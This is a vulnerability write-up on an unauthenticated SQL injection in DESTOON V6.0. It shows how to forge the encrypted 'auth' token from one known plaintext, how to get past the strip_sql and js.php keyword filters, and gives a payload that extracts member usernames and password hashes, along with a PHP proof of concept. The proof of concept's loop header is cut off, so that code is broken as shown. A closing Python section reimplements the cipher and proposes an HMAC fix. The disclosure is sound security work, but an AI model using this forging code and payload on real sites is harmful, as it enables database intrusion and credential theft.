DESTOON V6.0 Front-end SQL Injection Without Login

Source: Internet
Author: User

I spent one night on this. Fortunately,
it involves an algorithm (no brute force) and a few SQL tricks.
Because the vulnerability was written up overnight, the algorithm analysis may be a little unclear, so I have restated it several times =
After writing so much, I just want to get to the essence ~

Detailed description:

---------------------------------------------------------------------

#1 algorithm analysis

-------------

Compared with the earlier version, which could be attacked by brute force, the latest algorithm has been improved considerably.

    function encrypt($txt, $key = '') {
        $key or $key = DT_KEY;
        $rnd = random(32);
        $txt = $txt.substr($key, 0, 3);
        $len = strlen($txt);
        $ctr = 0;
        $str = '';
        for($i = 0; $i < $len; $i++) {
            $ctr = $ctr == 32 ? 0 : $ctr;
            $str .= $rnd[$ctr].($txt[$i] ^ $rnd[$ctr++]);
        }
        return str_replace(array('=', '+', '/', '0x', '0X'), array('', '-P-', '-S-', '-Z-', '-X-'), base64_encode(kecrypt($str, $key)));
    }

    function decrypt($txt, $key = '') {
        $key or $key = DT_KEY;
        $txt = kecrypt(base64_decode(str_replace(array('-P-', '-S-', '-Z-', '-X-'), array('+', '/', '0x', '0X'), $txt)), $key);
        $len = strlen($txt);
        $str = '';
        for($i = 0; $i < $len; $i++) {
            $tmp = $txt[$i];
            $str .= $txt[++$i] ^ $tmp;
        }
        return substr($str, -3) == substr($key, 0, 3) ? substr($str, 0, -3) : '';
    }

    function kecrypt($txt, $key) {
        $key = md5($key);
        $len = strlen($txt);
        $ctr = 0;
        $str = '';
        for($i = 0; $i < $len; $i++) {
            $ctr = $ctr == 32 ? 0 : $ctr;
            $str .= $txt[$i] ^ $key[$ctr++];
        }
        return $str;
    }


We can see that the IV was changed from $rnd = md5(microtime()) to $rnd = random(32);

As it stands, the transformation can still be inverted quickly (the random bytes are stored next to the data they mask),

however, we can see that the following line was added:

    return substr($str, -3) == substr($key, 0, 3) ? substr($str, 0, -3) : '';

It is meant to check data integrity. We now work backwards through the decryption process.

1. First, base64_decode(str_replace(array('-P-', '-S-', '-Z-', '-X-'), array('+', '/', '0x', '0X'), $txt)) undoes the special-symbol replacement and base64 encoding.

2. The result goes through kecrypt.

(The derivation was given as an image in the original post because the formulas did not render; the image is not reproduced here.)

Conclusion:

For the first N-6 bytes of the decoded ciphertext C, XORing bytes i and i+1 (i even) with the corresponding plaintext byte gives a fixed value that does not depend on the random bytes:

    C[i] ^ C[i+1] ^ P[i/2] = K[i % 32] ^ K[(i+1) % 32],   K = md5(DT_KEY)

For the last 6 bytes of the ciphertext (they carry the 3-byte key prefix), the values are the same for any two ciphertexts whose lengths are congruent modulo 32.

That is to say, to obtain the ciphertext for a plaintext of length x, you only need a known plaintext of length y together with its ciphertext, where

    (2x+6) % 32 = (2y+6) % 32.

-----------------------------------------------

#2 waf Bypass

-----------

In /api/js.php,

    <?php
    $_SERVER['REQUEST_URI'] = '';
    require '../common.inc.php';
    header("Content-type:text/javascript");
    check_referer() or exit('document.write("Invalid Referer");');
    $tag = isset($auth) ? strip_sql(decrypt($auth)) : '';
    $tag or exit('document.write("Bad Parameter");');
    foreach(array($DT_PRE, '#', '$', '%', '&', 'table', 'fields', 'password', 'payword', 'debug') as $v) {
        strpos($tag, $v) === false or exit('document.write("Bad Parameter");');
    }
    ob_start();
    tag($tag);
    $data = ob_get_contents();
    ob_clean();
    echo 'document.write(\''.dwrite($data ? $data : 'No Data or Bad Parameter').'\');';
    ?>

The decrypted value is passed to tag(), whose relevant part is:

    function tag($parameter, $expires = 0) {
        ...  // irrelevant code omitted
        parse_str($parameter, $par);
        if(!is_array($par)) return '';
        $par = dstripslashes($par);
        extract($par, EXTR_SKIP);
        ...
        $order = $order ? ' ORDER BY '.$order : '';
        ...
        $query = "SELECT ".$fields." FROM ".$table." WHERE ".$condition.$order." LIMIT ".$offset.",".$pagesize;


We can see that fields, table, condition, order, offset and pagesize are concatenated into the query without being enclosed in single quotes.

However, the loop in js.php rejects any tag that contains the table prefix or the words table, fields, password, payword or debug:

    foreach(array($DT_PRE, '#', '$', '%', '&', 'table', 'fields', 'password', 'payword', 'debug') as $v) {
        strpos($tag, $v) === false or exit('document.write("Bad Parameter");');
    }

so we can only control condition, order, offset and pagesize.

The next step is to bypass strip_sql.

    function strip_sql($string, $type = 1) {
        $match = array(
            "/union/i", "/where/i", "/outfile/i", "/dumpfile/i", "/0x([a-f0-9]{2,})/i",
            "/select([\s\S]*?)from/i",
            "/select([\s\*\/\-\(\+@])/i", "/update([\s\*\/\-\(\+@])/i", "/replace([\s\*\/\-\(\+@])/i",
            "/delete([\s\*\/\-\(\+@])/i", "/drop([\s\*\/\-\(\+@])/i",
            "/load_file[\s]*\(/i", "/substring[\s]*\(/i", "/substr[\s]*\(/i", "/left[\s]*\(/i",
            "/concat[\s]*\(/i", "/concat_ws[\s]*\(/i", "/make_set[\s]*\(/i", "/ascii[\s]*\(/i",
            "/hex[\s]*\(/i", "/ord[\s]*\(/i", "/char[\s]*\(/i"
        );
        // In the original source the replacement strings are look-alike (full-width) characters that
        // neuter the keyword; this page's extraction appears to have normalized them back to ASCII.
        $replace = array(
            'union', 'where', 'outfile', 'dumpfile', '0x\\1',
            'select\\1from',
            'select\\1', 'update\\1', 'replace\\1', 'delete\\1', 'drop\\1',
            'load_file(', 'substring(', 'substr(', 'left(', 'concat(', 'concat_ws(', 'make_set(',
            'ascii(', 'hex(', 'ord(', 'char('
        );
        if($type) {
            return is_array($string) ? array_map('strip_sql', $string) : preg_replace($match, $replace, $string);
        } else {
            return str_replace(array('d', 'e', 'g', 'i', 'n', 'p', 'r', 's', 't', 'x'), array('d', 'e', 'g', 'i', 'n', 'p', 'r', 's', 't', 'x'), $string);
        }
    }

This filter is weak.

It blocks "select ... from" (any characters in between) and "select" followed by whitespace or an operator,

but note that after LIMIT the query concatenates $offset.",".$pagesize, and strip_sql runs over the whole tag string, so the order of the parameters in that string matters.

If we submit pagesize=from&offset=select xxx&moduleid=2&condition=userid=1, the "from" appears before the "select" in the filtered string and the "select ... from" pattern never matches,

and writing select{x(name)} (a brace instead of a space) gets past the "select xxx" pattern.

For convenience, debug was enabled so that error-based injection can be demonstrated.

The payload used for the test is

pagesize="!"))}from DESTOON_MEMBER order by userid limit 1)),1)&offset=1,1 procedure analyse(extractvalue(rand(),(select{x(insert(insert(PASSWORD,1,0,username),1,0&moduleid=2&condition=userid=1

It is 193 bytes long. By the formula above, (2x + 6) % 32 = (2y + 6) % 32, we only need a ciphertext whose plaintext is known and 17 bytes long.

A known pair of that length is easy to find in the company contact information the site displays.
 

Proof of vulnerability:

PoC:

    <?php
    function cracked($Expressly, $Ciphertext, $str) {
        $Ciphertext = str_replace(array('-P-', '-S-', '-Z-', '-X-'), array('+', '/', '0x', '0X'), $Ciphertext);
        $Ciphertext = base64_decode($Ciphertext);
        $c = strlen($Ciphertext);
        $text2 = "a";
        $j = 0;
        $s = 0;
        for($i = 0; $i   // the rest of this loop header is cut off in the source
            if($j == 32) { $j = 0; $s = 0; }
            $tmp = $Ciphertext[$j] ^ $Ciphertext[$j + 1];
            $tmp = $tmp ^ $Expressly[$s];
            $tmp = $tmp ^ $str[$i];
            $text1 = $tmp ^ $text2;
            $xxoo = $xxoo.$text2.$text1;
            $j = $j + 2;
        }
        for($i = 5; $i >= 1; $i = $i - 2) {
            $tmp = $Ciphertext[$c - $i] ^ $Ciphertext[$c - $i - 1] ^ 'a';
            $xxoo = $xxoo.'a'.$tmp;
        }
        echo str_replace(array('+', '/', '0x', '0X'), array('-P-', '-S-', '-Z-', '-X-'), base64_encode($xxoo));
    }
    cracked("[email protected]", "f018SggzVGUtHlo6J0ZaOg5rekJ6bnUGdQBgF1FhKURALgJiClMrTg", 'pagesize="!"))}from DESTOON_MEMBER order by userid limit 1)),1)&offset=1,1 procedure analyse(extractvalue(rand(),(select{x(insert(insert(PASSWORD,1,0,username),1,0&moduleid=2&condition=userid=1');
    ?>
 


Pass the obtained value as auth:

Submit /api/js.php?auth=xxx

with a Referer header that satisfies check_referer(), and the injection runs.

Solution:

Change the algorithm; see the one used by Discuz! (dz) for reference.
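As an added example, not from the original post or from DESTOON, here is a Python reimplementation of the three PHP functions from section #1. It checks the section's conclusion (XORing a ciphertext byte pair with the plaintext byte gives a per-position constant that the random bytes do not hide, so the trailing key-prefix comparison is not an integrity check: a token can be altered and still be accepted) and shows the kind of change this Solution asks for: an HMAC-SHA256 over the token, verified in constant time, which rejects any modified token. DT_KEY, the sample tag string and all function names are constructed for the example; the URL-safe character substitution ('-P-', '-S-', ...) is omitted because it does not affect the analysis, and os.urandom stands in for the page's random(32).

```python
import base64
import hashlib
import hmac
import os

# Constructed placeholder; the real DT_KEY is per-installation and not on the page.
DT_KEY = b"example-site-key"


def kecrypt(txt: bytes, key: bytes) -> bytes:
    """The page's kecrypt(): XOR with the 32 hex characters of md5(key), repeating every 32 bytes."""
    k = hashlib.md5(key).hexdigest().encode()
    return bytes(b ^ k[i % 32] for i, b in enumerate(txt))


def dt_encrypt(txt: bytes, key: bytes = DT_KEY, rnd: bytes = b"") -> bytes:
    """The page's encrypt(): append key[:3], interleave a random byte with (byte ^ random byte),
    then kecrypt and base64. The page's random(32) yields alphanumerics; any 32 bytes behave alike."""
    rnd = rnd or os.urandom(32)
    txt = txt + key[:3]                      # the 3-byte key prefix is the only "integrity" tag
    out = bytearray()
    for i, b in enumerate(txt):
        r = rnd[i % 32]
        out += bytes([r, b ^ r])
    return base64.b64encode(kecrypt(bytes(out), key))


def dt_decrypt(token: bytes, key: bytes = DT_KEY) -> bytes:
    """The page's decrypt(): undo kecrypt, XOR each byte pair, then compare the trailing key prefix."""
    raw = kecrypt(base64.b64decode(token), key)
    pt = bytes(raw[i] ^ raw[i + 1] for i in range(0, len(raw) - 1, 2))
    return pt[:-3] if pt[-3:] == key[:3] else b""


def pair_constants(token: bytes, plaintext: bytes) -> list[int]:
    """C[2i] ^ C[2i+1] ^ P[i] for each plaintext position: anyone holding one known
    plaintext/ciphertext pair can compute it, and the random bytes cancel out."""
    raw = base64.b64decode(token)
    return [raw[2 * i] ^ raw[2 * i + 1] ^ plaintext[i] for i in range(len(plaintext))]


def expected_constants(n: int, key: bytes = DT_KEY) -> list[int]:
    """The page's conclusion: that constant is K[2i mod 32] ^ K[(2i+1) mod 32], K = md5(key) hex."""
    k = hashlib.md5(key).hexdigest().encode()
    return [k[(2 * i) % 32] ^ k[(2 * i + 1) % 32] for i in range(n)]


def flip_plaintext_byte(token: bytes, index: int, mask: int) -> bytes:
    """Malleability check: XOR-ing the odd byte of pair `index` XORs the recovered plaintext byte,
    and nothing in dt_decrypt notices because the key prefix at the end is untouched."""
    raw = bytearray(base64.b64decode(token))
    raw[2 * index + 1] ^= mask
    return base64.b64encode(bytes(raw))


# --- the fix: a real integrity check (encrypt-then-MAC with HMAC-SHA256), names constructed here ---

def _mac_key(key: bytes) -> bytes:
    # Derive a separate MAC key so the cipher key is not reused for authentication.
    return hashlib.sha256(b"dt-auth-mac:" + key).digest()


def seal(txt: bytes, key: bytes = DT_KEY) -> bytes:
    body = dt_encrypt(txt, key)
    tag = hmac.new(_mac_key(key), body, hashlib.sha256).digest()
    return body + b"." + base64.b64encode(tag)


def open_sealed(token: bytes, key: bytes = DT_KEY) -> bytes:
    body, sep, tag_b64 = token.rpartition(b".")
    if not sep:
        return b""
    try:
        tag = base64.b64decode(tag_b64, validate=True)
    except ValueError:
        return b""
    expected = hmac.new(_mac_key(key), body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return b""                           # any change to body or tag is rejected here
    return dt_decrypt(body, key)


if __name__ == "__main__":
    p = b"moduleid=2&condition=userid=1"      # constructed sample tag string
    t1, t2 = dt_encrypt(p), dt_encrypt(p)
    print(t1 != t2, pair_constants(t1, p) == pair_constants(t2, p) == expected_constants(len(p)))
    print(dt_decrypt(flip_plaintext_byte(t1, 0, 0x01)))        # accepted although one byte changed
    body, _, tag = seal(p).rpartition(b".")
    print(open_sealed(flip_plaintext_byte(body, 0, 0x01) + b"." + tag))  # b'': rejected
```

The HMAC closes the forgery the post describes, because a body that was not produced by the server no longer carries a valid tag. It does not repair the confidentiality of the underlying XOR construction (one known plaintext still reveals the per-position constants for every token of the same length class), so a real rewrite should move to an authenticated cipher such as AES-GCM; the standard library has none, the `cryptography` package does.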
